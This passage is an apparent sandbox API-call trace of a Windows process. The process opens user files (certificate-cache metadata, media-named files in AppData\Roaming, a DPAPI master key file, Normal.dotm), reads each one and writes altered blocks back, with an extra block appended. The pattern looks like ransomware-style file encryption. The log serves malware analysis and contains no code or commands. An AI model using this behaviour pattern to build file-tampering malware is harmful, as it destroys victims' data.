[0179.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0179.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", cchWideChar=65, lpMultiByteStr=0x1fac7bc, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpUsedDefaultChar=0x0) returned 65 [0179.984] ReadFile (in: hFile=0x1fc, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x186, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2d5f2bc*=0x186, lpOverlapped=0x0) returned 1 [0179.985] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0179.985] WriteFile (in: hFile=0x1fc, lpBuffer=0x3cfcae8*, nNumberOfBytesToWrite=0x70e, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3cfcae8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x70e, lpOverlapped=0x0) returned 1 [0179.985] CloseHandle (hObject=0x1fc) returned 1 [0179.986] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0180.278] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.278] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x194 [0180.278] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.278] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.279] ReleaseMutex (hMutex=0x168) returned 1 [0180.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0180.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", cchWideChar=65, lpMultiByteStr=0x1faca7c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpUsedDefaultChar=0x0) returned 65 [0180.279] ReadFile (in: hFile=0x1d8, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x194, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2d5f2bc*=0x194, lpOverlapped=0x0) returned 1 [0180.280] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0180.280] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a56c8*, nNumberOfBytesToWrite=0x71c, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x71c, lpOverlapped=0x0) returned 1 [0180.281] CloseHandle (hObject=0x1d8) returned 1 [0180.281] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0180.282] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.282] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x204 [0180.282] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.282] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.282] ReleaseMutex (hMutex=0x168) returned 1 [0180.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0180.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", cchWideChar=65, lpMultiByteStr=0x1faca7c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpUsedDefaultChar=0x0) returned 65 [0180.283] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x204, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x2d5f2bc*=0x204, lpOverlapped=0x0) returned 1 [0180.503] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0180.503] WriteFile (in: hFile=0x1d8, lpBuffer=0x2876dd8*, nNumberOfBytesToWrite=0x78c, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2876dd8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x78c, lpOverlapped=0x0) returned 1 [0180.503] CloseHandle (hObject=0x1d8) returned 1 [0180.503] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0180.506] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.506] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x18e [0180.506] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.506] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.506] ReleaseMutex (hMutex=0x168) returned 1 [0180.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0180.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", cchWideChar=65, lpMultiByteStr=0x1faca7c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpUsedDefaultChar=0x0) returned 65 [0180.506] ReadFile (in: hFile=0x1d8, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x18e, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2d5f2bc*=0x18e, lpOverlapped=0x0) returned 1 [0180.508] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0180.508] WriteFile (in: hFile=0x1d8, lpBuffer=0x3d0bb18*, nNumberOfBytesToWrite=0x716, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3d0bb18*, lpNumberOfBytesWritten=0x2d5f2d0*=0x716, lpOverlapped=0x0) returned 1 [0180.508] CloseHandle (hObject=0x1d8) returned 1 [0180.508] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-rbDXM07LrJg6VWDF.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-rbdxm07lrjg6vwdf.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0180.509] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.509] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x18f7a [0180.509] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.509] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.509] ReleaseMutex (hMutex=0x168) returned 1 [0180.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="-rbDXM07LrJg6VWDF.m4a", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0180.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="-rbDXM07LrJg6VWDF.m4a", cchWideChar=21, lpMultiByteStr=0x1f88b2c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-rbDXM07LrJg6VWDF.m4a", lpUsedDefaultChar=0x0) returned 21 [0180.509] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a96d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a96d8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.510] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x17f7a [0180.510] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e92278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e92278*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.510] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x17f7a [0180.511] WriteFile (in: hFile=0x1d8, lpBuffer=0x2886de8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2886de8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.512] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0180.512] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a96d8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a96d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.512] CloseHandle (hObject=0x1d8) returned 1 [0180.512] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CIdb36h.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cidb36h.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0180.512] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.512] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x8bec [0180.513] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.513] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.513] ReleaseMutex (hMutex=0x168) returned 1 [0180.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CIdb36h.wav", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CIdb36h.wav", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CIdb36h.wav", lpUsedDefaultChar=0x0) returned 11 [0180.513] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a96d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a96d8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.514] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7bec [0180.514] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e92278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e92278*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.514] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7bec [0180.515] WriteFile (in: hFile=0x1d8, lpBuffer=0x2886de8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2886de8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.515] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0180.516] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a96d8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a96d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.516] CloseHandle (hObject=0x1d8) returned 1 [0180.516] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HUZeDy34vE.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\huzedy34ve.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0180.517] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.517] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xe4c1 [0180.517] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.517] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.517] ReleaseMutex (hMutex=0x168) returned 1 [0180.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HUZeDy34vE.avi", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0180.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HUZeDy34vE.avi", cchWideChar=14, lpMultiByteStr=0x1f7366c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HUZeDy34vE.avi", lpUsedDefaultChar=0x0) returned 14 [0180.517] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a96d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a96d8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.518] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xd4c1 [0180.518] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e92278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e92278*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.519] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xd4c1 [0180.519] WriteFile (in: hFile=0x1d8, lpBuffer=0x2886de8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2886de8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.519] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0180.519] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a96d8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a96d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.520] CloseHandle (hObject=0x1d8) returned 1 [0180.520] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0180.525] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.525] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1d4 [0180.525] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.526] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.526] ReleaseMutex (hMutex=0x168) returned 1 [0180.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="02540a10-7eb7-4b20-a8c7-470f8986389c", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0180.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="02540a10-7eb7-4b20-a8c7-470f8986389c", cchWideChar=36, lpMultiByteStr=0x1fa54dc, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="02540a10-7eb7-4b20-a8c7-470f8986389c", lpUsedDefaultChar=0x0) returned 36 [0180.526] ReadFile (in: hFile=0x1f0, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1d4, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x2d5f2bc*=0x1d4, lpOverlapped=0x0) returned 1 [0180.527] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0180.527] WriteFile (in: hFile=0x1f0, lpBuffer=0x28fc2f8*, nNumberOfBytesToWrite=0x75c, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28fc2f8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x75c, lpOverlapped=0x0) returned 1 [0180.527] CloseHandle (hObject=0x1f0) returned 1 [0180.528] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0180.529] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.529] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x509b [0180.530] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.530] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.530] ReleaseMutex (hMutex=0x168) returned 1 [0180.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Normal.dotm", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Normal.dotm", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal.dotm", lpUsedDefaultChar=0x0) returned 11 [0180.530] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e92278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e92278*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.539] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x409b [0180.539] ReadFile (in: hFile=0x1f0, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.561] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x409b [0180.561] WriteFile (in: hFile=0x1f0, lpBuffer=0x2886de8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2886de8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, 